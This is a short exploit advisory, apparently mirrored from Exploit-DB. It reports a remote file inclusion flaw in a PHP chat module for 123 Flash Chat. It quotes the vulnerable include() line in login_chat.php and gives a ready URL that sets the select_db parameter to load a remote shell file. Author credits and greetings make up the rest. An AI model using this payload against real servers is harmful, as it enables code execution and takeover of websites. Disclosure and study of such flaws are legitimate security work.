PHP Chat for 123 Flash Chat – Remote File Inclusion

  • 作者: HaCkEr arar
    日期: 2010-07-20
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/14425/
  • *# Exploit Title: php_chat Remote File inclusion Vulnerability
    # Date: 2010/07/20
    # Author: HaCkEr arar
    # Email: y.0@hotmail.de
    # My Sites : www.vbspiders.com
    # Script home:
    http://www.opensourcescripts.com/dir/PHP/Chat/php_chat_module_for123_flash_chat_4902.html
    # Tested on: Windows
    # Team hacker:HaCkEr aRaR & ViRuS Qalaa >>>X-MaN HaCk3r TeaM
    # ViRuS Qalaa: em9@live.com
    :::::::::::::::::::::::::
    =================Exploit=================
    
    -=[ vuln c0de ]=-
    include('db/'.$select_db.'.php');
    login_chat.php
    Line:41
    
    ----exploit----
    
    http://{localhost}/{path}login_chat.php?select_db=shell.txt?
    
    ---------greatz----------
    Greatz to :
    ViRuS Qalaa,VoLc4n0,Members www.j1q1.com
    
    and My friends Others and My friends in MSN
    EnJoY o_O*